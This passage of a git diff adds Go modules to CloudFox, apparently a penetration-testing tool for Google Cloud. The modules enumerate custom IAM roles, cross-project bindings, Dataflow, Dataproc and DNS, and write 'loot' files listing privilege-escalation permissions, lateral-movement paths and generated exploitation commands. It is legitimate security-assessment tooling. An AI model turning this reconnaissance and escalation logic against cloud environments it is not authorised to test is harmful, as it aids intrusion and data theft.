) +} + +func (m *CrossProjectModule) addLateralMovementToLoot(path crossprojectservice.LateralMovementPath) { + m.LootMap["lateral-movement-paths"].Contents += fmt.Sprintf( + "## [%s] %s -> %s\n"+ + "## Principal: %s\n"+ + "## Method: %s\n"+ + "## Roles: %s\n", + path.PrivilegeLevel, path.SourceProject, path.TargetProject, + path.SourcePrincipal, + path.AccessMethod, + strings.Join(path.TargetRoles, ", "), + ) + + if len(path.ExploitCommands) > 0 { + m.LootMap["lateral-movement-paths"].Contents += "## Exploitation:\n" + for _, cmd := range path.ExploitCommands { + m.LootMap["lateral-movement-paths"].Contents += cmd + "\n" + } + } + m.LootMap["lateral-movement-paths"].Contents += "\n" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Cross-project bindings table + bindingsHeader := []string{ + "Risk", + "Source Project", + "Target Project", + "Principal", + "Type", + "Role", + "Reasons", + } + + var bindingsBody [][]string + for _, binding := range m.CrossBindings { + reasons := strings.Join(binding.RiskReasons, "; ") + if len(reasons) > 50 { + reasons = reasons[:50] + "..." + } + + // Shorten principal for display + principal := binding.Principal + if len(principal) > 40 { + principal = principal[:37] + "..." + } + + bindingsBody = append(bindingsBody, []string{ + binding.RiskLevel, + binding.SourceProject, + binding.TargetProject, + principal, + binding.PrincipalType, + binding.Role, + reasons, + }) + } + + // Cross-project service accounts table + sasHeader := []string{ + "Service Account", + "Home Project", + "# Target Projects", + "Target Access", + } + + var sasBody [][]string + for _, sa := range m.CrossProjectSAs { + // Count unique target projects + projectSet := make(map[string]bool) + for _, access := range sa.TargetAccess { + parts := strings.Split(access, ":") + if len(parts) > 0 { + projectSet[parts[0]] = true + } + } + + accessSummary := strings.Join(sa.TargetAccess, "; ") + if len(accessSummary) > 60 { + accessSummary = accessSummary[:60] + "..." + } + + sasBody = append(sasBody, []string{ + sa.Email, + sa.ProjectID, + fmt.Sprintf("%d", len(projectSet)), + accessSummary, + }) + } + + // Lateral movement paths table + pathsHeader := []string{ + "Privilege", + "Source Project", + "Target Project", + "Principal", + "Method", + "Roles", + } + + var pathsBody [][]string + for _, path := range m.LateralMovementPaths { + // Shorten principal for display + principal := path.SourcePrincipal + if len(principal) > 40 { + principal = principal[:37] + "..." + } + + roles := strings.Join(path.TargetRoles, ", ") + if len(roles) > 40 { + roles = roles[:40] + "..." + } + + pathsBody = append(pathsBody, []string{ + path.PrivilegeLevel, + path.SourceProject, + path.TargetProject, + principal, + path.AccessMethod, + roles, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + var tables []internal.TableFile + + if len(bindingsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cross-project-bindings", + Header: bindingsHeader, + Body: bindingsBody, + }) + } + + if len(sasBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cross-project-sas", + Header: sasHeader, + Body: sasBody, + }) + } + + if len(pathsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "lateral-movement-paths", + Header: pathsHeader, + Body: pathsBody, + }) + } + + output := CrossProjectOutput{ + Table: tables, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CROSSPROJECT_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/customroles.go b/gcp/commands/customroles.go new file mode 100644 index 00000000..15a22475 --- /dev/null +++ b/gcp/commands/customroles.go @@ -0,0 +1,391 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + customrolesservice "github.com/BishopFox/cloudfox/gcp/services/customRolesService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCustomRolesCommand = &cobra.Command{ + Use: globals.GCP_CUSTOMROLES_MODULE_NAME, + Aliases: []string{"roles", "custom-role"}, + Short: "Analyze custom IAM roles for dangerous permissions", + Long: `Analyze custom IAM roles for overly permissive or dangerous permissions. + +This module focuses on identifying custom roles that may be exploited for: +- Privilege escalation (SA key creation, token generation, IAM modification) +- Data exfiltration (secret access, storage access, BigQuery access) +- Persistence (instance creation, function deployment, metadata modification) +- Lateral movement (SA impersonation, GKE access, Cloud SQL access) + +Features: +- Lists all custom roles in specified projects +- Identifies dangerous permissions in each role +- Highlights privilege escalation permissions +- Generates exploitation commands for risky roles +- Provides risk scoring (CRITICAL, HIGH, MEDIUM, LOW) + +Use with privesc module for complete privilege escalation analysis.`, + Run: runGCPCustomRolesCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CustomRolesModule struct { + gcpinternal.BaseGCPModule + + Roles []customrolesservice.CustomRoleInfo + RoleAnalyses []customrolesservice.RolePermissionAnalysis + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CustomRolesOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CustomRolesOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CustomRolesOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCustomRolesCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CUSTOMROLES_MODULE_NAME) + if err != nil { + return + } + + module := &CustomRolesModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Roles: []customrolesservice.CustomRoleInfo{}, + RoleAnalyses: []customrolesservice.RolePermissionAnalysis{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CustomRolesModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CUSTOMROLES_MODULE_NAME, m.processProject) + + if len(m.Roles) == 0 { + logger.InfoM("No custom IAM roles found", globals.GCP_CUSTOMROLES_MODULE_NAME) + return + } + + // Count risky roles + criticalCount := 0 + highCount := 0 + for _, role := range m.Roles { + switch role.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d custom role(s)", len(m.Roles)), globals.GCP_CUSTOMROLES_MODULE_NAME) + + if criticalCount > 0 || highCount > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d CRITICAL, %d HIGH risk custom role(s)!", criticalCount, highCount), globals.GCP_CUSTOMROLES_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CustomRolesModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing custom roles in project: %s", projectID), globals.GCP_CUSTOMROLES_MODULE_NAME) + } + + svc := customrolesservice.New() + + roles, err := svc.ListCustomRoles(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list custom roles in project %s: %v", projectID, err), globals.GCP_CUSTOMROLES_MODULE_NAME) + } + return + } + + var analyses []customrolesservice.RolePermissionAnalysis + for _, role := range roles { + analysis := svc.AnalyzeRoleInDepth(role) + analyses = append(analyses, analysis) + } + + m.mu.Lock() + m.Roles = append(m.Roles, roles...) + m.RoleAnalyses = append(m.RoleAnalyses, analyses...) + + for _, role := range roles { + m.addRoleToLoot(role) + } + for _, analysis := range analyses { + m.addAnalysisToLoot(analysis) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d custom role(s) in project %s", len(roles), projectID), globals.GCP_CUSTOMROLES_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CustomRolesModule) initializeLootFiles() { + m.LootMap["custom-roles-all"] = &internal.LootFile{ + Name: "custom-roles-all", + Contents: "# Custom IAM Roles\n# Generated by CloudFox\n\n", + } + m.LootMap["custom-roles-dangerous"] = &internal.LootFile{ + Name: "custom-roles-dangerous", + Contents: "# Dangerous Custom IAM Roles\n# Generated by CloudFox\n# Roles with privilege escalation or high-risk permissions\n\n", + } + m.LootMap["custom-roles-privesc"] = &internal.LootFile{ + Name: "custom-roles-privesc", + Contents: "# Custom Roles with Privilege Escalation Permissions\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["custom-roles-exploit"] = &internal.LootFile{ + Name: "custom-roles-exploit", + Contents: "# Custom Role Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *CustomRolesModule) addRoleToLoot(role customrolesservice.CustomRoleInfo) { + m.LootMap["custom-roles-all"].Contents += fmt.Sprintf( + "## Role: %s\n"+ + "## Project: %s\n"+ + "## Title: %s\n"+ + "## Permissions: %d\n"+ + "## Risk Level: %s\n\n", + role.Name, + role.ProjectID, + role.Title, + role.PermissionCount, + role.RiskLevel, + ) + + // Dangerous roles + if role.RiskLevel == "CRITICAL" || role.RiskLevel == "HIGH" { + m.LootMap["custom-roles-dangerous"].Contents += fmt.Sprintf( + "## [%s] Role: %s (Project: %s)\n"+ + "## Title: %s\n"+ + "## Permissions: %d\n", + role.RiskLevel, role.Name, role.ProjectID, + role.Title, + role.PermissionCount, + ) + + if len(role.RiskReasons) > 0 { + m.LootMap["custom-roles-dangerous"].Contents += "## Risk Reasons:\n" + for _, reason := range role.RiskReasons { + m.LootMap["custom-roles-dangerous"].Contents += fmt.Sprintf("## - %s\n", reason) + } + } + + if len(role.DangerousPerms) > 0 { + m.LootMap["custom-roles-dangerous"].Contents += "## Dangerous Permissions:\n" + for _, perm := range role.DangerousPerms { + m.LootMap["custom-roles-dangerous"].Contents += fmt.Sprintf("## - %s\n", perm) + } + } + m.LootMap["custom-roles-dangerous"].Contents += "\n" + } + + // Privesc-specific roles + if len(role.PrivescPerms) > 0 { + m.LootMap["custom-roles-privesc"].Contents += fmt.Sprintf( + "## [%s] Role: %s (Project: %s)\n"+ + "## Privilege Escalation Permissions:\n", + role.RiskLevel, role.Name, role.ProjectID, + ) + for _, perm := range role.PrivescPerms { + m.LootMap["custom-roles-privesc"].Contents += fmt.Sprintf("## - %s\n", perm) + } + m.LootMap["custom-roles-privesc"].Contents += "\n" + } +} + +func (m *CustomRolesModule) addAnalysisToLoot(analysis customrolesservice.RolePermissionAnalysis) { + if len(analysis.ExploitCommands) > 0 { + m.LootMap["custom-roles-exploit"].Contents += fmt.Sprintf( + "## [%s] Role: %s (Project: %s)\n"+ + "## Dangerous: %d, Privesc: %d\n", + analysis.RiskLevel, analysis.RoleName, analysis.ProjectID, + analysis.DangerousCount, analysis.PrivescCount, + ) + for _, cmd := range analysis.ExploitCommands { + m.LootMap["custom-roles-exploit"].Contents += cmd + "\n" + } + m.LootMap["custom-roles-exploit"].Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CustomRolesModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main roles table + rolesHeader := []string{ + "Risk", + "Role Name", + "Title", + "Permissions", + "Dangerous", + "Privesc", + "Stage", + "Project", + } + + var rolesBody [][]string + for i, role := range m.Roles { + dangerousCount := 0 + privescCount := 0 + if i < len(m.RoleAnalyses) { + dangerousCount = m.RoleAnalyses[i].DangerousCount + privescCount = m.RoleAnalyses[i].PrivescCount + } + + rolesBody = append(rolesBody, []string{ + role.RiskLevel, + role.Name, + role.Title, + fmt.Sprintf("%d", role.PermissionCount), + fmt.Sprintf("%d", dangerousCount), + fmt.Sprintf("%d", privescCount), + role.Stage, + role.ProjectID, + }) + } + + // Dangerous permissions table + dangerousHeader := []string{ + "Risk", + "Role", + "Permission", + "Description", + "Project", + } + + var dangerousBody [][]string + svc := customrolesservice.New() + dangerousPerms := svc.GetDangerousPermissions() + dangerousMap := make(map[string]customrolesservice.DangerousPermission) + for _, dp := range dangerousPerms { + dangerousMap[dp.Permission] = dp + } + + for _, role := range m.Roles { + for _, perm := range role.DangerousPerms { + if dp, found := dangerousMap[perm]; found { + dangerousBody = append(dangerousBody, []string{ + dp.RiskLevel, + role.Name, + perm, + dp.Description, + role.ProjectID, + }) + } + } + } + + // Privesc roles table + privescHeader := []string{ + "Role", + "Privesc Permissions", + "Project", + } + + var privescBody [][]string + for _, role := range m.Roles { + if len(role.PrivescPerms) > 0 { + perms := strings.Join(role.PrivescPerms, ", ") + if len(perms) > 60 { + perms = perms[:60] + "..." + } + privescBody = append(privescBody, []string{ + role.Name, + perms, + role.ProjectID, + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "custom-roles", + Header: rolesHeader, + Body: rolesBody, + }, + } + + if len(dangerousBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "custom-roles-dangerous-perms", + Header: dangerousHeader, + Body: dangerousBody, + }) + } + + if len(privescBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "custom-roles-privesc", + Header: privescHeader, + Body: privescBody, + }) + } + + output := CustomRolesOutput{ + Table: tables, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CUSTOMROLES_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/dataflow.go b/gcp/commands/dataflow.go new file mode 100644 index 00000000..5a557dbc --- /dev/null +++ b/gcp/commands/dataflow.go @@ -0,0 +1,199 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + dataflowservice "github.com/BishopFox/cloudfox/gcp/services/dataflowService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDataflowCommand = &cobra.Command{ + Use: globals.GCP_DATAFLOW_MODULE_NAME, + Aliases: []string{"df", "pipelines"}, + Short: "Enumerate Dataflow jobs and pipelines", + Long: `Enumerate Dataflow jobs with security analysis. + +Features: +- Lists all Dataflow jobs (batch and streaming) +- Shows service account configuration +- Identifies network exposure (public IPs) +- Analyzes temp/staging storage locations +- Detects default service account usage`, + Run: runGCPDataflowCommand, +} + +type DataflowModule struct { + gcpinternal.BaseGCPModule + Jobs []dataflowservice.JobInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type DataflowOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DataflowOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DataflowOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPDataflowCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DATAFLOW_MODULE_NAME) + if err != nil { + return + } + + module := &DataflowModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Jobs: []dataflowservice.JobInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *DataflowModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DATAFLOW_MODULE_NAME, m.processProject) + + if len(m.Jobs) == 0 { + logger.InfoM("No Dataflow jobs found", globals.GCP_DATAFLOW_MODULE_NAME) + return + } + + // Count by state + running := 0 + publicIPs := 0 + for _, job := range m.Jobs { + if job.State == "JOB_STATE_RUNNING" { + running++ + } + if job.UsePublicIPs { + publicIPs++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Dataflow job(s) (%d running, %d with public IPs)", + len(m.Jobs), running, publicIPs), globals.GCP_DATAFLOW_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *DataflowModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Dataflow in project: %s", projectID), globals.GCP_DATAFLOW_MODULE_NAME) + } + + svc := dataflowservice.New() + jobs, err := svc.ListJobs(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list Dataflow jobs: %v", err), globals.GCP_DATAFLOW_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Jobs = append(m.Jobs, jobs...) + for _, job := range jobs { + m.addToLoot(job) + } + m.mu.Unlock() +} + +func (m *DataflowModule) initializeLootFiles() { + m.LootMap["dataflow-jobs"] = &internal.LootFile{ + Name: "dataflow-jobs", + Contents: "# Dataflow Jobs\n# Generated by CloudFox\n\n", + } + m.LootMap["dataflow-service-accounts"] = &internal.LootFile{ + Name: "dataflow-service-accounts", + Contents: "", + } +} + +func (m *DataflowModule) addToLoot(job dataflowservice.JobInfo) { + m.LootMap["dataflow-jobs"].Contents += fmt.Sprintf( + "# Job: %s (%s)\n# Type: %s\n# State: %s\n# Service Account: %s\n# Public IPs: %v\n\n", + job.Name, job.ID, job.Type, job.State, job.ServiceAccount, job.UsePublicIPs) + + if job.ServiceAccount != "" { + m.LootMap["dataflow-service-accounts"].Contents += job.ServiceAccount + "\n" + } +} + +func (m *DataflowModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Name", "Type", "State", "Location", "Service Account", + "Public IPs", "Workers", "Risk", "Project", + } + + var body [][]string + for _, job := range m.Jobs { + publicIPs := "No" + if job.UsePublicIPs { + publicIPs = "Yes" + } + + sa := job.ServiceAccount + if sa == "" { + sa = "(default)" + } else if len(sa) > 40 { + sa = sa[:37] + "..." + } + + body = append(body, []string{ + job.Name, + job.Type, + job.State, + job.Location, + sa, + publicIPs, + fmt.Sprintf("%d", job.NumWorkers), + job.RiskLevel, + job.ProjectID, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{{Name: "dataflow", Header: header, Body: body}} + + // High-risk jobs table + var highRiskBody [][]string + for _, job := range m.Jobs { + if job.RiskLevel == "HIGH" || job.RiskLevel == "MEDIUM" { + highRiskBody = append(highRiskBody, []string{ + job.Name, + job.RiskLevel, + strings.Join(job.RiskReasons, "; "), + job.ProjectID, + }) + } + } + + if len(highRiskBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "dataflow-risks", + Header: []string{"Job", "Risk Level", "Reasons", "Project"}, + Body: highRiskBody, + }) + } + + output := DataflowOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DATAFLOW_MODULE_NAME) + } +} diff --git a/gcp/commands/dataproc.go b/gcp/commands/dataproc.go new file mode 100644 index 00000000..cb41c621 --- /dev/null +++ b/gcp/commands/dataproc.go @@ -0,0 +1,218 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + dataprocservice "github.com/BishopFox/cloudfox/gcp/services/dataprocService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDataprocCommand = &cobra.Command{ + Use: globals.GCP_DATAPROC_MODULE_NAME, + Aliases: []string{"dp", "hadoop", "spark"}, + Short: "Enumerate Dataproc clusters", + Long: `Enumerate Dataproc (Hadoop/Spark) clusters. + +Features: +- Lists all Dataproc clusters across regions +- Shows service account configuration +- Identifies public IP exposure +- Checks for Kerberos authentication +- Analyzes security configurations`, + Run: runGCPDataprocCommand, +} + +type DataprocModule struct { + gcpinternal.BaseGCPModule + Clusters []dataprocservice.ClusterInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type DataprocOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DataprocOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DataprocOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPDataprocCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DATAPROC_MODULE_NAME) + if err != nil { + return + } + + module := &DataprocModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Clusters: []dataprocservice.ClusterInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *DataprocModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DATAPROC_MODULE_NAME, m.processProject) + + if len(m.Clusters) == 0 { + logger.InfoM("No Dataproc clusters found", globals.GCP_DATAPROC_MODULE_NAME) + return + } + + runningCount := 0 + publicCount := 0 + for _, cluster := range m.Clusters { + if cluster.State == "RUNNING" { + runningCount++ + } + if !cluster.InternalIPOnly { + publicCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Dataproc cluster(s) (%d running, %d with public IPs)", + len(m.Clusters), runningCount, publicCount), globals.GCP_DATAPROC_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *DataprocModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Dataproc in project: %s", projectID), globals.GCP_DATAPROC_MODULE_NAME) + } + + svc := dataprocservice.New() + + clusters, err := svc.ListClusters(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list Dataproc clusters: %v", err), globals.GCP_DATAPROC_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Clusters = append(m.Clusters, clusters...) + for _, cluster := range clusters { + m.addToLoot(cluster) + } + m.mu.Unlock() +} + +func (m *DataprocModule) initializeLootFiles() { + m.LootMap["dataproc-clusters"] = &internal.LootFile{ + Name: "dataproc-clusters", + Contents: "# Dataproc Clusters\n# Generated by CloudFox\n\n", + } + m.LootMap["dataproc-service-accounts"] = &internal.LootFile{ + Name: "dataproc-service-accounts", + Contents: "", + } + m.LootMap["dataproc-buckets"] = &internal.LootFile{ + Name: "dataproc-buckets", + Contents: "", + } +} + +func (m *DataprocModule) addToLoot(cluster dataprocservice.ClusterInfo) { + m.LootMap["dataproc-clusters"].Contents += fmt.Sprintf( + "# Cluster: %s\n# Region: %s\n# State: %s\n# Service Account: %s\n# Public IPs: %v\n\n", + cluster.Name, cluster.Region, cluster.State, cluster.ServiceAccount, !cluster.InternalIPOnly) + + if cluster.ServiceAccount != "" { + m.LootMap["dataproc-service-accounts"].Contents += cluster.ServiceAccount + "\n" + } + + if cluster.ConfigBucket != "" { + m.LootMap["dataproc-buckets"].Contents += fmt.Sprintf("gs://%s # config bucket for %s\n", cluster.ConfigBucket, cluster.Name) + } + if cluster.TempBucket != "" { + m.LootMap["dataproc-buckets"].Contents += fmt.Sprintf("gs://%s # temp bucket for %s\n", cluster.TempBucket, cluster.Name) + } +} + +func (m *DataprocModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Clusters table + header := []string{"Name", "Region", "State", "Master", "Workers", "Service Account", "Public IPs", "Kerberos", "Risk", "Project"} + var body [][]string + for _, cluster := range m.Clusters { + publicIPs := "No" + if !cluster.InternalIPOnly { + publicIPs = "Yes" + } + kerberos := "No" + if cluster.KerberosEnabled { + kerberos = "Yes" + } + sa := cluster.ServiceAccount + if sa == "" { + sa = "(default)" + } else if len(sa) > 35 { + sa = sa[:32] + "..." + } + masterConfig := fmt.Sprintf("%s x%d", cluster.MasterMachineType, cluster.MasterCount) + workerConfig := fmt.Sprintf("%s x%d", cluster.WorkerMachineType, cluster.WorkerCount) + + body = append(body, []string{ + cluster.Name, + cluster.Region, + cluster.State, + masterConfig, + workerConfig, + sa, + publicIPs, + kerberos, + cluster.RiskLevel, + cluster.ProjectID, + }) + } + tables = append(tables, internal.TableFile{ + Name: "dataproc-clusters", + Header: header, + Body: body, + }) + + // High-risk findings + var highRiskBody [][]string + for _, cluster := range m.Clusters { + if cluster.RiskLevel == "HIGH" || cluster.RiskLevel == "MEDIUM" { + highRiskBody = append(highRiskBody, []string{ + cluster.Name, + cluster.RiskLevel, + strings.Join(cluster.RiskReasons, "; "), + cluster.ProjectID, + }) + } + } + + if len(highRiskBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "dataproc-risks", + Header: []string{"Cluster", "Risk Level", "Reasons", "Project"}, + Body: highRiskBody, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := DataprocOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DATAPROC_MODULE_NAME) + } +} diff --git a/gcp/commands/dns.go b/gcp/commands/dns.go new file mode 100644 index 00000000..122bfd3f --- /dev/null +++ b/gcp/commands/dns.go @@ -0,0 +1,398 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + DNSService "github.com/BishopFox/cloudfox/gcp/services/dnsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDNSCommand = &cobra.Command{ + Use: globals.GCP_DNS_MODULE_NAME, + Aliases: []string{"zones", "cloud-dns"}, + Short: "Enumerate Cloud DNS zones and records with security analysis", + Long: `Enumerate Cloud DNS managed zones and records across projects. + +Features: +- Lists all DNS managed zones (public and private) +- Shows zone configuration (DNSSEC, visibility, peering) +- Enumerates DNS records for each zone +- Identifies interesting records (A, CNAME, TXT, MX) +- Shows private zone VPC bindings +- Generates gcloud commands for DNS management + +Security Columns: +- Visibility: public or private +- DNSSEC: Whether DNSSEC is enabled +- Networks: VPC networks for private zones +- Peering: Cross-project DNS peering + +Attack Surface: +- Public zones expose domain infrastructure +- TXT records may contain sensitive info (SPF, DKIM, verification) +- Private zones indicate internal network structure +- DNS forwarding may expose internal resolvers`, + Run: runGCPDNSCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type DNSModule struct { + gcpinternal.BaseGCPModule + + Zones []DNSService.ZoneInfo + Records []DNSService.RecordInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type DNSOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DNSOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DNSOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPDNSCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DNS_MODULE_NAME) + if err != nil { + return + } + + module := &DNSModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Zones: []DNSService.ZoneInfo{}, + Records: []DNSService.RecordInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *DNSModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DNS_MODULE_NAME, m.processProject) + + if len(m.Zones) == 0 { + logger.InfoM("No DNS zones found", globals.GCP_DNS_MODULE_NAME) + return + } + + // Count zone types + publicCount := 0 + privateCount := 0 + for _, zone := range m.Zones { + if zone.Visibility == "public" { + publicCount++ + } else { + privateCount++ + } + } + + msg := fmt.Sprintf("Found %d zone(s), %d record(s)", len(m.Zones), len(m.Records)) + if publicCount > 0 { + msg += fmt.Sprintf(" [%d public]", publicCount) + } + if privateCount > 0 { + msg += fmt.Sprintf(" [%d private]", privateCount) + } + logger.SuccessM(msg, globals.GCP_DNS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *DNSModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating DNS in project: %s", projectID), 